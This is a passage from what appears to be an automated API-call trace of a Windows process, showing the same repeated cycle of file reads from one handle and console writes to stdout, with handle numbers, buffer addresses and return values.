lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.064] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.064] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.065] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.065] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.066] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.066] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.067] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.067] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.068] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.068] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.070] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.070] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] GetFileType (hFile=0x50) returned 0x1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.071] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.071] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] GetFileType (hFile=0x50) returned 0x1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] GetFileType (hFile=0x50) returned 0x1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] GetFileType (hFile=0x50) returned 0x1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 